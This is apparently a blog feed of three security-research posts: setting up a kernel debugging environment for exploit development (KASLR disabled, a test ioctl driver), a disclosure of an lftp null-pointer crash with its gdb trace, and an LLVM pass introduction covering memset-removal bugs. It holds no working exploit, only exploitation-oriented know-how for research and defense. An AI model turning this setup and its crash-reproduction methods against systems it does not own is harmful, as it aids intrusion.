Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-44804191777232934082020-11-10T21:10:00.006-08:002020-11-11T07:04:37.255-08:00[Linux Kernel Exploitation 0x0] Debugging the Kernel with QEMU<p>Hi folks, in this post I'm going to walk through how to set up the Linux kernel for debugging. I will also demonstrate that the setup works by setting a breakpoint in a test driver I wrote myself. All the code is available on my gitlab, and all the links to it are re-posted at the end. </p><p>The setup I describe here re-uses some parts of the syzkaller setup, and for good reason: later on in the post series I will break into a tutorial for the syzkaller tool as well. So let's get on with it.</p><p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfJqc1KEObI3B8RhfyqjoOUwTXhdpmQu9hz7XBB9dYBsJsCUSZF1KpdPz3hATngUhAI5uKNpkTQtG2Ks3aWGIl_v_VfkZoJOQQk-xWPyYRLrXCiHEem39M2tIoPHQ3AP1KRWCpQ6odRMs/s1109/Screenshot+from+2020-11-11+17-00-44.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="625" data-original-width="1109" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfJqc1KEObI3B8RhfyqjoOUwTXhdpmQu9hz7XBB9dYBsJsCUSZF1KpdPz3hATngUhAI5uKNpkTQtG2Ks3aWGIl_v_VfkZoJOQQk-xWPyYRLrXCiHEem39M2tIoPHQ3AP1KRWCpQ6odRMs/w640-h360/Screenshot+from+2020-11-11+17-00-44.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Screenshot of a successful debug session with full debug symbols for the kernel! 
We can even see the call to start_kernel and a frame before that as well!<br /></td></tr></tbody></table><br /> </p><h2 style="text-align: left;">The Process</h2><p>Okay, so we want to study kernel exploitation. However, since the kernel isn't directly accessible from userspace, it's not as convenient to debug as userspace programs. We need a bit of a run-up before we can actually poke and prod the kernel to figure out how to write our exploits. There are a number of important steps to getting this done. Here's what we're going to do:</p><ol style="text-align: left;"><li>Build a kernel</li><li>Build an image</li><li>Launch the virtual machine </li><li>Attach and set up the debugger</li><li>Build, load and debug a test module <br /></li></ol><p>We also need to be able to build the kernel ourselves, because we may need to configure build options that control exploit protections, or include modules and functionality in the kernel when needed. <br /></p><h2 style="text-align: left;">Building a Kernel</h2><p>Okay, so before we get going with launching our Qemu instances and debugging modules, we need an environment. For convenience's sake I'm working off of a fresh Ubuntu 18.04.5 LTS machine. 
I'll document the process from fresh install to first successful kernel build.</p><p>To start, we need to make sure we have everything required to build a kernel:</p><p><br /></p><p><span style="font-family: courier;">$<b>sudo apt-get update</b></span></p><p><span style="font-family: courier;">$<b>sudo apt-get upgrade </b><br /></span></p><p><span style="font-family: courier;">$<b>sudo apt-get install git fakeroot build-essential ncurses-dev xz-utils libssl-dev bc flex libelf-dev bison qemu-system-x86</b></span></p><p><span style="font-family: courier;"><b> </b> </span><br /></p><p>Next, we obviously need a kernel, so let's download a brand new one:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">$<b>wget https://cdn.kernel.org/pub/linux/kernel/v5.x/linux-5.9.7.tar.xz</b><br />--2020-11-10 23:00:26-- https://cdn.kernel.org/pub/linux/kernel/v5.x/linux-5.9.7.tar.xz<br />Resolving cdn.kernel.org (cdn.kernel.org)... 151.101.225.176, 2a04:4e42:35::432<br />Connecting to cdn.kernel.org (cdn.kernel.org)|151.101.225.176|:443... connected.<br />HTTP request sent, awaiting response... 200 OK<br />Length: 115538096 (110M) [application/x-xz]<br />Saving to: ‘linux-5.9.7.tar.xz’<br /><br />linux-5.9.7.tar.xz 42%[=============> ] 46.79M 3.08MB/s eta 23s </span></p><p><span style="font-family: courier;"><br /></span></p><p><span style="font-family: courier;">... <br /></span></p><p><span style="font-family: courier;">$<b>tar -xf linux-5.9.7.tar.xz</b></span></p><p><span style="font-family: courier;">$<b>cd linux-5.9.7</b></span></p><p> </p><p>We're just a couple of steps from sending the final build commands. Before we get to that, let's make sure the kernel config is ready to rock. 
Because we're working on a Linux host, we can simply swipe the .config of the machine's own Ubuntu kernel like so:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">$<b>cp /boot/config-5.4.0-52-generic .config</b></span></p><p> </p><p>We then need to select some options that make debugging and exploit dev a little easier. The first thing we need is to merge in some options that make the kernel easier to run in a virtual machine:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">$<b>make kvmconfig</b></span></p><p><span style="font-family: courier;">Using .config as base<br />Merging ./kernel/configs/kvm_guest.config<br />#<br /># merged configuration written to .config (needs make)<br />#</span></p><p><span style="font-family: courier;">...</span></p><p> </p><p>Great, now we need to enable debug symbols, KASAN, KCOV and a few other awesome things, and disable KASLR. So open the <span style="font-family: courier;">.config</span> in a text editor and add or modify lines so these options are set:</p><p><span style="font-family: courier;">CONFIG_KCOV=y<br />CONFIG_DEBUG_INFO=y<br />CONFIG_KASAN=y<br />CONFIG_KASAN_INLINE=y<br />CONFIG_CONFIGFS_FS=y<br />CONFIG_SECURITYFS=y </span><br /><span style="font-family: courier;"><span style="font-family: courier;"># CONFIG_RANDOMIZE_BASE is not set<br /></span></span></p><p>Cool, now we need to make sure the config is ready to go for a build:</p><p><span style="font-family: courier;">$<b>make savedefconfig</b></span></p><p><span style="font-family: courier;">$<b>make -j4</b></span></p><p><span style="font-family: courier;"> ...</span></p><p>Now you should grab some coffee or play a StarCraft II game, because this may take a while. 
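</p><p>If you'd rather not hand-edit the <span style="font-family: courier;">.config</span> every time you rebuild, you can script the option changes listed above. The kernel tree already ships <span style="font-family: courier;">scripts/config</span> for exactly this (for example <span style="font-family: courier;">scripts/config --enable DEBUG_INFO --disable RANDOMIZE_BASE</span>). The Python below is only a minimal sketch of the same idea, and its function names are hypothetical. It does not resolve Kconfig dependencies, so running <span style="font-family: courier;">make olddefconfig</span> afterwards is a sensible precaution.</p>

```python
import re

# Options from the list above: True -> "CONFIG_X=y", False -> "# CONFIG_X is not set"
DEBUG_OPTIONS = {
    "CONFIG_KCOV": True,
    "CONFIG_DEBUG_INFO": True,
    "CONFIG_KASAN": True,
    "CONFIG_KASAN_INLINE": True,
    "CONFIG_CONFIGFS_FS": True,
    "CONFIG_SECURITYFS": True,
    "CONFIG_RANDOMIZE_BASE": False,
}


def set_kconfig(text: str, options: dict) -> str:
    """Return .config text with each option forced on (=y) or off (not set)."""
    lines = text.splitlines()
    for name, enabled in options.items():
        wanted = f"{name}=y" if enabled else f"# {name} is not set"
        # Matches both "CONFIG_X=<value>" and "# CONFIG_X is not set", but not CONFIG_X_SUFFIX
        pattern = re.compile(rf"^(?:{re.escape(name)}=.*|# {re.escape(name)} is not set)$")
        for i, line in enumerate(lines):
            if pattern.match(line):
                lines[i] = wanted
                break
        else:  # option not present at all: append it
            lines.append(wanted)
    return "\n".join(lines) + "\n"


def patch_config_file(path: str = ".config") -> None:
    """Apply DEBUG_OPTIONS to a .config file in place."""
    with open(path) as f:
        patched = set_kconfig(f.read(), DEBUG_OPTIONS)
    with open(path, "w") as f:
        f.write(patched)
```

<p>Calling <span style="font-family: courier;">patch_config_file()</span> from the kernel directory rewrites <span style="font-family: courier;">.config</span> in place. Options that are already present are edited where they sit, and missing ones are appended at the end.</p><p>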
Okay, so if your build worked, you should have a compressed kernel image in the following location:</p><p><span style="font-family: courier;">[kernel_dir]/arch/x86_64/boot/bzImage</span> </p><h2 style="text-align: left;">Build an image</h2><p>We're going to build an image for this kernel, so we might as well plop an "image" directory in this folder:</p><p><span style="font-family: courier;">$<b>mkdir [kernel_dir]/image/</b></span></p><p>Once your kernel is built, we need to start thinking about how to build a file system for it. Here I'm going to cheat and steal some tips from the syzkaller folks. We first need to download syzkaller:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">$<b>git clone https://github.com/google/syzkaller.git</b></span></p><p><span style="font-family: courier;">Cloning into 'syzkaller'...<br />remote: Enumerating objects: 1, done.<br />remote: Counting objects: 100% (1/1), done.<br />...<br /></span></p><p> </p><p>Move back to the kernel build and set up an image:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">$<b>cd [kernel_dir]/image/</b></span></p><p><span style="font-family: courier;">$<b>cp [syzkaller_dir]/tools/create-image.sh .</b></span></p><p> </p><p>Okay, so we can now create an image. All we need to do is invoke create-image.sh:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">$<b>./create-image.sh </b></span></p><p><span style="font-family: courier;">+ DIR=chroot<br />+ PREINSTALL_PKGS=openssh-server,curl,tar,gcc,libc6-dev,time,strace,sudo,less,psmisc,selinux-utils,policycoreutils,checkpolicy,selinux-policy-default,firmware-atheros,python,xrdp,g++,make,libtool,autoconf,nasm<br />+ '[' -z ']'<br />+ ADD_PACKAGE=make,sysbench,git,vim,tmux,usbutils,tcpdump</span></p><p><span style="font-family: courier;">...</span><br /></p><p> </p><p>If that worked, you 
should have the following in your folder:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">$<b>ls</b> </span></p><p><span style="font-family: courier;">chroot/</span></p><p><span style="font-family: courier;">create-image.sh</span></p><p><span style="font-family: courier;">stretch.id_rsa</span></p><p><span style="font-family: courier;">stretch.id_rsa.pub</span></p><p><span style="font-family: courier;">stretch.img</span><br /></p><p><br /></p><h2 style="text-align: left;">Launch the virtual machine <br /></h2><p>Now we can launch qemu with all the goodies in place:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">qemu-system-x86_64 \<br /> -kernel <b>../arch/x86_64/boot/bzImage</b> \<br /> -append "console=ttyS0 root=/dev/sda earlyprintk=serial nokaslr" \<br /> -hda <b>./stretch.img</b> \<br /> -net user,hostfwd=tcp::10021-:22 -net nic \<br /> -enable-kvm \<br /> -nographic \<br /> -m 2G \<br /> -s \<br /> -S \<br /> -smp 2 \<br /> -pidfile vm.pid \<br /> 2>&1 | tee vm.log</span></p><p><span style="font-family: courier;">...</span></p><p><br />The <span style="font-family: courier;">-s</span> option is shorthand for <span style="font-family: courier;">-gdb tcp::1234</span>, which means the gdb server will listen on port 1234. <span style="font-family: courier;">-S</span> tells qemu not to start the CPU automatically. This gives us a chance to set a breakpoint before the kernel starts executing. </p><p>So that's the image running smoothly. Let's set up our debugging environment.</p><p><br /></p><h2 style="text-align: left;">Attach and set up the debugger<br /></h2><p>We can then attach a gdb debugger to the qemu instance as follows. 
On another terminal, separate from the one running your qemu instance, start up gdb and issue the following commands:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">$<b>cd [kernel_dir]/image/ </b><br /></span></p><p><span style="font-family: courier;">$<b>gdb ../vmlinux<br /></b></span></p><p><span style="font-family: courier;">Reading symbols from ../vmlinux...</span></p><p><span style="font-family: courier;">(gdb)<b> target remote :1234<br /></b></span></p><p><span style="font-family: courier;">Remote debugging using :1234<br />0x000000000000fff0 in exception_stacks ()<br /></span></p><p><span style="font-family: courier;">(gdb) <b>c</b></span></p><p> </p><p>We give the "c" command to continue execution. We can now set some of our own breakpoints. As part of the tutorial I've included a custom IOCTL driver and app code (code that invokes the ioctl from userspace). I thought this would be nifty since it shows the full ability to develop and debug a driver, something crucial to hunting down modern bugs and to exploit development. 
Anyway, let's code and build our own module.</p><p> </p><p> </p><h2 style="text-align: left;">Building, Loading and debugging a test module<br /></h2><p>Okay, so we need to make a test ioctl driver. Let's head over to the kernel source directory and make a new folder in the <span style="font-family: courier;">drivers/</span> subfolder:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">$</span><b><span style="font-family: courier;">cd [kernel_dir]/drivers/</span></b></p><p><span style="font-family: courier;">$</span><b><span style="font-family: courier;">mkdir debug_driver/</span></b></p><p><span style="font-family: courier;">$</span><b><span style="font-family: courier;">cd debug_driver/ <br /></span></b></p><p><span style="font-family: courier;">$</span><b><span style="font-family: courier;">touch debug_driver.c</span></b></p><p><span style="font-family: courier;">$</span><b><span style="font-family: courier;">touch debug_driver_app.c</span></b></p><p><span style="font-family: courier;">$</span><b><span style="font-family: courier;">touch Makefile</span></b></p><p> </p><p>The code for <span style="font-family: courier;">debug_driver.c</span> and <span style="font-family: courier;">debug_driver_app.c </span>as well as the <span style="font-family: courier;">Makefile</span> is available in this repo: <a href="https://gitlab.com/k3170makan/linux-kernel-exploit-development">https://gitlab.com/k3170makan/linux-kernel-exploit-development</a>. All you need to do is download the repo and stick these files in their own folder under <span style="font-family: courier;">[kernel_dir]/drivers/</span>. To build the module, we need to set the "M" variable when invoking the kernel's make:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">$<b>cd [kernel_dir]; make -C . 
M=drivers/debug_driver/</b></span></p><p><span style="font-family: courier;">make: Entering directory '/home/kh3m/Research/Kernel/debug_image/linux-5.5.3'<br /> AR drivers/debug_driver//built-in.a<br /> CC [M] drivers/debug_driver//debug_driver.o</span></p><p><span style="font-family: courier;">...</span></p><p> </p><p>Now we need to get this module onto our qemu guest somehow. I do this the hard way. I'm sure there are all sorts of nifty ways to scp files onto the qemu guest, but I actually just re-create the image after copying the drivers to a folder that gets baked into the start-up filesystem. First we need to edit create-image.sh so it includes everything in a folder we specify. That way we can just dump stuff in the folder and run create-image.sh whenever we want those files on a live instance.</p><p>So, before create-image.sh builds the disk image on line 129, stick this in there:</p><p>++ <span style="font-family: courier;">sudo cp -r ./add/* $DIR/home/.</span><br /></p><p>Now we make an "add" folder, stick the kernel module and app code in there, and rebuild the image from the <span style="font-family: courier;">image/</span> directory:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">$<b> cd [kernel_dir]/image/</b></span></p><p><span style="font-family: courier;">$ <b>mkdir add/</b></span></p><p><span style="font-family: courier;">$ <b>cd add/</b></span></p><p><span style="font-family: courier;">$ <b>cp ../../drivers/debug_driver/debug_driver.ko .</b><br /></span></p><p><span style="font-family: courier;">$ <b>cp ../../drivers/debug_driver/debug_driver_app.c .</b></span></p><p><span style="font-family: courier;">$ <b>cd ..</b></span></p><p><span style="font-family: courier;">$ <b>./create-image.sh</b> </span></p><p> </p><p>Okay, so we have a module, and debug_driver.ko carries the symbols we need to set breakpoints. 
Let's load the module into the kernel, then check where it gets loaded before we actually set the breakpoint:</p><p><br /></p><p><span style="font-family: courier;">root@syzkaller:$ <b>cd /home/</b></span></p><p><span style="font-family: courier;">root@syzkaller:$ <b>insmod debug_driver.ko</b></span></p><p><span style="font-family: courier;"> [ 32.792570] audit: type=1400 audit(1605058227.605:7): avc: denied { module_load } for pid=249 comm="insmod" path="/home/debug_driver.ko" dev="sda" ino=21253 scontext=system_u:system_r:kernel_t:s0 1<br />[ 32.793766] debug_driver: loading out-of-tree module taints kernel.<br />[ 32.800394] [debug_driver] loaded! <br />[ 32.800826] [debug_driver] device registered successfully<br />[ 32.802298] [debug_driver] device has been successfully created <b><br /></b></span></p><p> </p><p>Before we can debug it properly, we need to know where it is loaded in kernel memory:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">root@syzkaller:/home# <b>cat /proc/modules</b> <br />debug_driver 16384 0 - Live <b>0xffffffffa0000000</b> (O)</span></p><p> </p><p>Okay, let's now load the symbol file at the module's base address and set our breakpoint:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;"> (gdb) <b>add-symbol-file ../drivers/debug_driver/debug_driver.ko 0xffffffffa0000000</b><br />add symbol table from file "../drivers/debug_driver/debug_driver.ko" at<br /> .text_addr = 0xffffffffa0000000<br />(y or n) <b>y</b><br />Reading symbols from ../drivers/debug_driver/debug_driver.ko...<br />(gdb) <b>break dev_read</b><br />Breakpoint 1 at <b>0xffffffffa0000010: file drivers/debug_driver//debug_driver.c</b>, line 81.<br />(gdb) c</span><br /><br /></p><p> </p><p>Cool, let's execute the driver program so we can trigger the code we want:</p><p><span style="font-family: courier;"> </span></p><p><span style="font-family: courier;">root@syzkaller:$ <b>gcc -o 
debug_driver_app.elf debug_driver_app.c<br /></b></span></p><p><span style="font-family: courier;"><span style="font-family: courier;">root@syzkaller:/home# <b>./debug_driver_app.elf </b><br />Usage: ./debug_driver_app.elf [message to write] [read length] <br /></span></span></p><p><span style="font-family: courier;"><span style="font-family: courier;">root@syzkaller:</span>$ <b>./debug_driver_app.elf "hello" 10</b></span></p><span style="font-family: courier;">[ 160.083320] [debug_driver] message successfully copied message => [hello]<br />[ 160.083326] [debug_driver] buffer copied to message holder<br />[debug_driver] r[ 160.086175] [debug_driver] device released </span><p><br /></p><p> </p><p>This should trigger the <span style="font-family: courier;">dev_read</span> function, as we can see in the attached debugger:</p><p><span style="font-family: courier;"><b> </b></span></p><p><span style="font-family: courier;"><b>Thread 2 hit Breakpoint 1, dev_read</b> (filep=0xffff888067c29dc0, buffer=0xffff888067c29dc0 "", <br /> len=16, offset=0xffffc900002c7eb8) at drivers/debug_driver//debug_driver.c:81<br />81 error_count = copy_to_user(buffer,message,len); //copy out of message into buffer</span><br /><br /></p><p>So that's the breakpoint hit! We achieved our goal for this post. If you'd like to explore more, try setting more breakpoints, and before moving on to the next post make sure to get your gdb-fu up. The next post is going to look at exploitation of stack vulnerabilities. 
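</p><p>If you reload the module often, you can generate the <span style="font-family: courier;">/proc/modules</span> lookup and the <span style="font-family: courier;">add-symbol-file</span> command instead of typing them. Here's a minimal Python sketch with hypothetical helper names. It assumes the <span style="font-family: courier;">/proc/modules</span> line format shown above, and it assumes you read the file as root, because unprivileged readers typically see zeroed addresses due to <span style="font-family: courier;">kptr_restrict</span>. The address in <span style="font-family: courier;">/proc/modules</span> is the module's base, which matched <span style="font-family: courier;">.text</span> in this session. If the two ever differ, <span style="font-family: courier;">/sys/module/debug_driver/sections/.text</span> gives the exact <span style="font-family: courier;">.text</span> address.</p>

```python
from typing import Optional


def module_base(proc_modules: str, name: str) -> Optional[int]:
    """Return the load address of module `name` from /proc/modules text, or None."""
    for line in proc_modules.splitlines():
        # Format: name size refcount deps state address [taint flags]
        fields = line.split()
        if len(fields) >= 6 and fields[0] == name:
            return int(fields[5], 16)  # int() accepts the 0x prefix with base 16
    return None


def add_symbol_file_cmd(ko_path: str, base: int) -> str:
    """Build the gdb command used in this post to load a module's symbols."""
    return f"add-symbol-file {ko_path} {base:#x}"
```

<p>The returned string can be pasted into the gdb session as-is. Because the helper only builds a string, it also runs outside gdb.</p><p>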
<br /></p><p></p><h2 style="text-align: left;">References and Reading</h2><ol style="text-align: left;"><li><a href="https://blog.infosectcbr.com.au/2020/02/linux-kernel-stack-smashing.html">https://blog.infosectcbr.com.au/2020/02/linux-kernel-stack-smashing.html</a></li><li><a href="https://www.kernel.org/doc/html/latest/dev-tools/gdb-kernel-debugging.html">https://www.kernel.org/doc/html/latest/dev-tools/gdb-kernel-debugging.html</a></li><li><a href="https://medium.com/@villebaillie25/how-to-debug-your-linux-kernel-570399f36acc">https://medium.com/@villebaillie25/how-to-debug-your-linux-kernel-570399f36acc</a> </li><li><a href="https://www.starlab.io/blog/using-gdb-to-debug-the-linux-kernel">https://www.starlab.io/blog/using-gdb-to-debug-the-linux-kernel</a></li><li><a href="https://opensource.com/article/18/10/kbuild-and-kconfig">https://opensource.com/article/18/10/kbuild-and-kconfig</a> </li><li><a href="https://nixos.wiki/wiki/Kernel_Debugging_with_QEMU">https://nixos.wiki/wiki/Kernel_Debugging_with_QEMU</a> </li><li>Debug driver code and Makefile <a href="https://gitlab.com/k3170makan/linux-kernel-exploit-development">https://gitlab.com/k3170makan/linux-kernel-exploit-development</a> <br /></li></ol>Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-44628360728856270332020-06-20T23:53:00.000-07:002020-06-20T23:57:40.842-07:00[Memory Corruption Bugs] Lftp Null pointer dereference (<= 4.9.1) in CmdExec::FeedCmd<div><br /></div><div><ul style="text-align: left;"><li>Date: 06-21-20<br /></li><li>Vendor Homepage: <a href="https://lftp.yar.ru/">https://lftp.yar.ru/</a><br /></li><li>Software Link: <a href="http://lftp.yar.ru/ftp/lftp-4.9.1.tar.gz">http://lftp.yar.ru/ftp/lftp-4.9.1.tar.gz</a> <br /></li><li>Version: <= 4.9.1 <br 
/></li><li>Bug link: <a href="https://github.com/lavv17/lftp/issues/593">https://github.com/lavv17/lftp/issues/593</a> <br /></li></ul></div><div>I've discovered a null pointer dereference bug in LFTP version 4.9.1, which probably affects previous versions as well. The bug occurs in CmdExec::FeedCmd and triggers in strlen due to a null pointer argument. The following gdb trace demonstrates this:</div><div><br /></div><div><br /></div><div><span style="font-family: courier;">(gdb) r -f lftp_cmdfile_fuzz/crashes/id:000000,sig:11,src:000000,op:havoc,rep:4 <br />The program being debugged has been started already.<br />...<br />Breakpoint 5, 0x0000000000461b61 in CmdExec::FeedCmd(char const*) ()<br />(gdb) x/5ig $rip<br />=> 0x461b61 <_ZN7CmdExec7FeedCmdEPKc+97>: callq 0x43a3a0 <b><strlen@plt></b><br /> 0x461b66 <_ZN7CmdExec7FeedCmdEPKc+102>: mov %rbx,%rdi<br /> 0x461b69 <_ZN7CmdExec7FeedCmdEPKc+105>: mov %r14,%rsi<br /> 0x461b6c <_ZN7CmdExec7FeedCmdEPKc+108>: mov %eax,%edx<br /> 0x461b6e <_ZN7CmdExec7FeedCmdEPKc+110>: add $0x8,%rsp</span></div><div><span style="font-family: courier;"><b>(gdb) x/1xg $rsi<br />0x0: Cannot access memory at address 0x0</b> <--- argument passed to strlen is a null pointer<br />(gdb) ni<br /><br />Program received signal SIGSEGV, Segmentation fault.<br />__strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:65<br />65 ../sysdeps/x86_64/multiarch/strlen-avx2.S: No such file or directory.<br />(gdb) i s<br />#0 __strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:65<br /><b>#1 0x0000000000461b66 in CmdExec::FeedCmd(char const*) ()</b><br />#2 0x00000000004726f7 in cmd_subsh(CmdExec*) ()<br />#3 0x0000000000462fa1 in CmdExec::exec_parsed_command() ()<br />#4 0x0000000000468d60 in CmdExec::Do() ()<br />#5 0x0000000000563a76 in SMTask::ScheduleThis() ()<br />#6 0x000000000056325d in SMTask::Schedule() ()<br />#7 0x00000000004604ce in Job::WaitDone() ()<br />#8 0x000000000043edfd in main ()</span><br /></div><div><br 
/></div><div>Testing this on the latest binaries from the Ubuntu repository:</div><div><br /></div><div><span style="font-family: courier;">>$ lftp -v<br />LFTP | Version 4.8.4 | Copyright (c) 1996-2017 Alexander V. Lukyanov<br /><br />LFTP is free software: you can redistribute it and/or modify<br />it under the terms of the GNU General Public License as published by<br />the Free Software Foundation, either version 3 of the License, or<br />(at your option) any later version.<br />...<br />>$ lftp -f ../lftp_cmdfile_fuzz/crashes/id\:000000\,sig\:11\,src\:000000\,op\:havoc\,rep\:4 <br /><b>Segmentation fault</b></span><br /><br /></div><div>Some closing remarks: I've reported the bug to the Debian folks so they are aware. It didn't make the bar for a vulnerability, but I think it may constitute a problem on some platforms and may point to bigger problems in the lftp code base. I don't know of any public ways to exploit this, but I'm posting it so there is a public record and awareness.</div>Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-57631553029575481752020-04-06T04:36:00.000-07:002020-04-06T04:57:30.969-07:00[Learning LLVM I ] Introduction to the LLVM Pass Framework<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Hi folks, it's been a while! In this post I'm going to talk about getting started with LLVM and discuss writing a basic pass, which we will build on as the series develops.<br />
<br />
<h2 style="text-align: left;">
Why LLVM?</h2>
<br />
LLVM is becoming really popular. With a sprawling community behind it and a string of research projects contributing plugins and passes, there's ever more reason to get involved and hack out some passes of your own. <br />
<br />
Let's start with the obvious question: what is LLVM? LLVM, formerly short for "Low Level Virtual Machine" (<i>I hear the acronym no longer means this</i>), now refers to a collection of tools that together make up a whole compiler architecture and toolchain. There are components that debug, instrument code, link libraries and much, much more. In this post we will focus on the part of LLVM that lets you interact with the compiler internals: the set of libraries called the LLVM Pass Framework.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6eqc4MAj02128sZWyxty5ax5tqMdLg-MfDanhfLpAqSR-gISat1PnsW3L7fBYFykfnFfVVKPRLY0ICO6DnqZ6z5DZ2SJnKGR8c6e5IG1oquNtBcuWNGPIjCFLb-aodmdvxrxNm-MMQv4/s1600/LLVM+Architecture.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="608" data-original-width="1045" height="372" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6eqc4MAj02128sZWyxty5ax5tqMdLg-MfDanhfLpAqSR-gISat1PnsW3L7fBYFykfnFfVVKPRLY0ICO6DnqZ6z5DZ2SJnKGR8c6e5IG1oquNtBcuWNGPIjCFLb-aodmdvxrxNm-MMQv4/s640/LLVM+Architecture.png" width="640" /></a></div>
<br />
<br />
An important thing to know about LLVM before we move on is its modular design. The actual compiler is composed of three separate components, namely the:<br />
<ul style="text-align: left;">
<li><b>Front-end</b> - which handles lexing, parsing and translating source code into LLVM's intermediate representation, or IR (<i>more on this in future posts</i>). IR is a powerful tool in compilers, especially here, because it means that whatever strange language you generated the IR from no longer matters to the phases that follow. LLVM can be re-targeted for pretty much whatever you can contrive into bitcode or IR. </li>
<li><b>Optimizer</b> - The optimizer performs, uhm, well, optimization on the IR passed to it. There are a ton of different optimizations (<i>I believe some papers speak of something like 100 different loop optimizations, for instance</i>). The optimizer strips out as many redundant lookups and dead variable assignments as possible, all backed by the static single assignment (SSA) form (<i>each register is only assigned a value once</i>). This SSA form allows the compiler to isolate important properties and anomalies in the language that would otherwise be quite ambiguous and tedious to code around. </li>
<li><b>Back-end</b> - This part of the compiler emits the actual machine-dependent assembly code. If you want to participate in machine-dependent code generation, then writing a <span style="font-family: "courier new" , "courier" , monospace;">MachineFunctionPass</span> is for you, since it kicks in every time a function is lowered to machine-dependent code (<i>I discuss the pass types further on in the post</i>). <i>Useful reasons to do this might be to check for differences between the IR and the machine code, to nuke certain instructions like cache flushes in case code is trying side-channel attacks, to inject functions that force code to run with a conditioned cache to defend against such attacks, or to instrument specific asm side effects at the machine level, and I'm sure tons more awesome stuff.</i></li>
</ul>
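<br />
To make the "assigned only once" idea concrete, here's a tiny C++ sketch. It is not LLVM code: the Assign struct and to_ssa function are hypothetical names made up for illustration, and the sketch only handles straight-line code (real SSA construction also inserts phi nodes wherever control flow merges). Every time a variable is reassigned it gets a fresh numbered version, and later reads refer to the latest version:<br />
```cpp
#include <cassert>
#include <map>
#include <string>
#include <vector>

// One straight-line assignment "dest = lhs op rhs". Operands are either
// variable names or integer literals written as strings.
struct Assign {
    std::string dest, lhs, op, rhs;
};

// Rename variables so every name is assigned exactly once (SSA form).
// Straight-line code only: real SSA construction also needs phi nodes
// where control flow merges, which this sketch does not handle.
std::vector<std::string> to_ssa(const std::vector<Assign> &code) {
    std::map<std::string, int> version;  // latest version number per variable

    // Reads refer to the latest version; literals and never-assigned
    // names are passed through unchanged.
    auto use = [&](const std::string &operand) {
        auto it = version.find(operand);
        return it == version.end() ? operand : operand + std::to_string(it->second);
    };

    std::vector<std::string> out;
    for (const Assign &a : code) {
        std::string l = use(a.lhs), r = use(a.rhs);  // read operands first...
        int v = ++version[a.dest];                   // ...then define a fresh version
        out.push_back(a.dest + std::to_string(v) + " = " + l + " " + a.op + " " + r);
    }
    return out;
}
```
Feeding it x = 1 + 0, x = x + 2, y = x * 3 gives x1 = 1 + 0, x2 = x1 + 2 and y1 = x2 * 3, which is roughly the shape LLVM IR takes with its numbered virtual registers.<br />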
We can see from the diagram above that IR flows between the different stages, meaning most passes actually operate on LLVM IR. So don't go in assuming that you can filter for stack base register behavior or instruction pointer weirdness; those machine-level details mostly aren't visible at the IR level. You'll have to get to grips with LLVM IR if you mean to do anything useful with the framework. It's the lingua franca of the compiler, so learn it well.<br />
<br />
This video is an excellent introduction to LLVM IR concepts; please check it out if you're looking for a well-structured and well-delivered introduction: <a href="https://www.youtube.com/watch?v=m8G_S5LwlTo">https://www.youtube.com/watch?v=m8G_S5LwlTo</a>.<br />
<br />
<h2 style="text-align: left;">
Here come the compiler bugs</h2>
<br />
A motivating factor for security folk like me is the advent of nifty security bugs that stem from compiler optimizations. One really good example is a bug class termed "memsad". The key issue here is applying aggressive optimizations to certain contexts of the memset call (Ilja van Sprundel from IOActive originally showed me this bug, defo check out what he has to say [<a href="https://media.ccc.de/v/35c3-9788-memsad">https://media.ccc.de/v/35c3-9788-memsad</a>]).<br />
<br />
What we learned here is that optimizations can actually remove <span style="font-family: "courier new" , "courier" , monospace;">memset</span> calls that are meant to clear cryptographic material from memory. The <span style="font-family: "courier new" , "courier" , monospace;">memset</span> optimization can culminate in almost Heartbleed-like conditions, directly compromising cryptographic operations if it goes unchecked for too long or appears in too many contexts. <br />
<br />
To clarify what I'm talking about, here's a potential example of memsad in RIOT-OS:<br />
<br />
<script src="https://gist.github.com/kh3m616/dafd200de28ccb4657903fa64a1364a9.js"></script> <br />
<br />
Extract from <a href="https://github.com/RIOT-OS/RIOT/issues/10751">https://github.com/RIOT-OS/RIOT/issues/10751</a><br />
<br />
In the code above you can see a call to memset (on line 14) with a buffer as an argument, after which the buffer is not used again before the function returns. In short, this means GCC (<i>and some other compilers</i>) will treat the buffer as dead after line 14 and remove the memset during optimization, correctly reasoning that it has no effect on the observable outcome of the function. The result is that in the code actually being run, the memset is never called.<br />
<br />
